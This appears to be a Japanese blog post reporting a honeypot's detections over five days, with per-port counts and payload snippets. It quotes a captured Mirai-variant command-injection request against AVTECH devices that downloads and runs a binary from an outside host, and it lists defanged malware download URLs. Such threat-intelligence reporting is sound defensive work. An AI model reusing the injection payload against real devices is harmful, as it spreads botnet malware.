【ハニーポット簡易分析】Honeytrap簡易分析(164-168日目:1/14-1/18)
【ハニーポット簡易分析】Honeytrap簡易分析(164-168日目:1/14-1/18)となります。なかなか、新規の脆弱性もありませんでしたが、Splunkでの検索条件の改善をして見たいと考えています。
Honeytrap簡易分析(164-168日目:1/14-1/18)
※80ポートは除く
月曜日に検知数が増加していますが、以下のようなRDPの不正アクセスを狙った通信を多数検知していたことが原因となります。
◾️ペイロード
...*%......Cookie: mstshash=Test..........
特定のIPからの通信でなく、複数のIPから検知していました。
<宛先別検知数>
1/14
| 宛先ポート | 検知数 | サービス | ペイロード例 |
| 445 | 965 | SMB | SMBrS@bPC NETWORK PROGRAM 1.0 |
| 8122 | 196 | SSH | SSH-2.0-libssh2_1.7.0.. |
| 1433 | 139 | Microsoft SQL Server | S.E.R.V.E.R.s.a.O.S.Q.L |
| 52869 | 127 | Realtek SDK | POST /picsdesc.xml |
| 222 | 81 | SSH | SSH-2.0-libssh2_1.7.0.. |
| 2222 | 72 | SSH | SSH-2.0-libssh2_1.7.0.. |
| 3389 | 72 | RDP | ...+&......Cookie: mstshash=hello.......... |
| 111 | 67 | ? | ? |
| 22222 | 67 | SSH | SSH-2.0-libssh2_1.7.0.. |
| 81 | 51 | GET login.cgi HTTP/1.1 | GoAhead Web Server |
1/15
| 宛先ポート | 検知数 | サービス | ペイロード例 |
| 445 | 1,082 | SMB | SMBrS@bPC NETWORK PROGRAM 1.0 |
| 1433 | 176 | Microsoft SQL Server | S.E.R.V.E.R.s.a.O.S.Q.L |
| 3389 | 150 | RDP | ...+&......Cookie: mstshash=hello.......... |
| 2222 | 71 | SSH | SSH-2.0-libssh2_1.7.0.. |
| 22222 | 63 | SSH | SSH-2.0-libssh2_1.7.0.. |
| 222 | 62 | SSH | SSH-2.0-libssh2_1.7.0.. |
| 6001 | 60 | ? | ? |
| 443 | 53 | HTTPS | ? |
| 81 | 53 | GET login.cgi HTTP/1.1 | GoAhead Web Server |
| 8000 | 42 | ? | ? |
1/16
| 宛先ポート | 検知数 | サービス | ペイロード例 |
| 445 | 1,014 | SMB | SMBrS@bPC NETWORK PROGRAM 1.0 |
| 1433 | 173 | Microsoft SQL Server | S.E.R.V.E.R.s.a.O.S.Q.L |
| 81 | 165 | GET login.cgi HTTP/1.1 | GoAhead Web Server |
| 443 | 103 | HTTPS | ? |
| 8080 | 84 | PROXY | GET / HTTP/1.1 |
| 6002 | 76 | ? | ? |
| 102 | 74 | TSAP | ? |
| 3389 | 66 | RDP | ...+&......Cookie: mstshash=hello.......... |
| 2222 | 65 | SSH | SSH-2.0-libssh2_1.7.0.. |
| 22222 | 61 | SSH | SSH-2.0-libssh2_1.7.0.. |
1/17
| 宛先ポート | 検知数 | サービス | ペイロード例 |
| 445 | 1,094 | SMB | SMBrS@bPC NETWORK PROGRAM 1.0 |
| 1433 | 186 | Microsoft SQL Server | S.E.R.V.E.R.s.a.O.S.Q.L |
| 50022 | 157 | SSH | SSH-2.0-libssh2_1.7.0.. |
| 62222 | 128 | SSH | SSH-2.0-libssh2_1.7.0.. |
| 443 | 105 | HTTPS | ? |
| 2222 | 65 | SSH | SSH-2.0-libssh2_1.7.0.. |
| 20547 | 63 | ? | ? |
| 22222 | 51 | SSH | SSH-2.0-libssh2_1.7.0.. |
| 3389 | 50 | RDP | ...+&......Cookie: mstshash=hello.......... |
| 222 | 43 | SSH | SSH-2.0-libssh2_1.7.0.. |
1/18
| 宛先ポート | 検知数 | サービス | ペイロード例 |
| 445 | 1,122 | SMB | SMBrS@bPC NETWORK PROGRAM 1.0 |
| 1433 | 170 | Microsoft SQL Server | S.E.R.V.E.R.s.a.O.S.Q.L |
| 3389 | 75 | RDP | ...+&......Cookie: mstshash=hello.......... |
| 503 | 66 | ? | ? |
| 2222 | 55 | SSH | SSH-2.0-libssh2_1.7.0.. |
| 443 | 55 | HTTPS | ? |
| 52869 | 45 | Realtek SDK | POST /picsdesc.xml |
| 22222 | 36 | SSH | SSH-2.0-libssh2_1.7.0.. |
| 81 | 36 | GET login.cgi HTTP/1.1 | GoAhead Web Server |
| 8888 | 36 | HyperVM HTTPS | ? |
全体の傾向としてはSSHが多い傾向でした。
また、AVTECHの脆弱性を突くMirai亜種の攻撃をポート 8000 で検知していました。80ポートでは検知していると他のハニーポッタも言っていましたが、様々なポートへ発生しているようです。
GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin%20;XmlAp%20r%20Account.User1.Password%3E$(cd%20/tmp;%20wget%20hxxp://185[.]244[.]25[.]114/kalon[.]arm5;chmod%20777%20kalon.arm5;sh%20kalon.arm5)&password=admin HTTP/1.1
取得を試みようとしているマルウェアはVirusTotalで判断出来ませんでしたか、おそらくMirai亜種もしくはGafgyt亜種と思われます。
<新規マルウェア>
| ポート | マルウェアダウンロード先 | VT |
| 52869 | hxxp://168[.]235[.]82[.]199/D[.]mips | |
| 52869 | hxxp://168[.]235[.]82[.]199/Demon[.]mips | VirusTotal |
| 52869 | hxxp://168[.]235[.]82[.]199/MaXDdTY/Demon[.]mips | VirusTotal |
| 52869 | hxxp://168[.]235[.]82[.]199/MaXDdTY/bins[.]sh | VirusTotal |
| 52869 | hxxp://k[.]silynigr[.]xyz/bins/qlu[.]mips |
パス部分にMaXDdTYの文字列が含まれていますが、何を意味するかまでは不明でした。新規の脆弱性を狙った攻撃は検知はありませんでした。
